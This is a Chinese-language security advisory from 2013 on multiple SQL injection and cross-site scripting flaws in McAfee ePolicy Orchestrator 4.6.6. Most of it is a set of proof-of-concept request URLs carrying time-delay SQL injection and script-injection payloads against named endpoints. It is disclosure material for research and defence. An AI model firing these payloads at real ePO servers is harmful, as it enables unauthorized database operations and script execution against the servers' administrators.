McAfee ePolicy Orchestrator多个SQL注入和跨站脚本漏洞
McAfee ePolicy Orchestrator多个SQL注入和跨站脚本漏洞
发布日期:2013-07-12
更新日期:2013-07-15
受影响系统:
McAfee ePolicy Orchestrator
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61145
McAfee ePolicy Orchestrator(ePO)是一种业界领先的系统安全管理解决方案,能够帮助企业有效抵御各种恶意威胁和攻击。
McAfee ePolicy Orchestrator 4.6.6存在多个SQL注入和跨站脚本漏洞,成功利用可使攻击者执行未授权数据库操作。
<*来源:Nuri Fattah
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SQL-injection
=============
http://www.example.com/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid= 6waitf or%20delay'0%3a0%3a20'-- &index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax Mode=standard HTTP/1.1
http://www.example.com/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer &uid=1;%20WAITFOR%20DELAY%20'0:0:0';-- &datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query Factory %3Aquery.2&index=0 HTTP/1.1
XSS:
====
http://www.example.com/core/loadDisplayType.do HTTP/1.1=20
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCp
y3ldihsCW&ajaxMode=standard
http://www.example.com/console/createDashboardContainer.do HTTP/1.1 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
http://www.example.com/console/createDashboardContainer.do HTTP/1.1 elementId=3DcustomURL.dashboard.factory3Ainstance&index=3D2&pageid=3D30&width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&
filteringEnabled=3Dfalse&monitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.security.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard
http://www.example.com/ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standardHTTP/1.1
http://www.example.com/ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion
.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
http://www.example.com/ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&or
ion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><
script>alert(30629)</script> HTTP/1.1
http://www.example.com/ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&o
rion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
http://www.example.com/ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script
&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1
建议:
--------------------------------------------------------------------------------
厂商补丁:
McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mcafee.com/
评论暂时关闭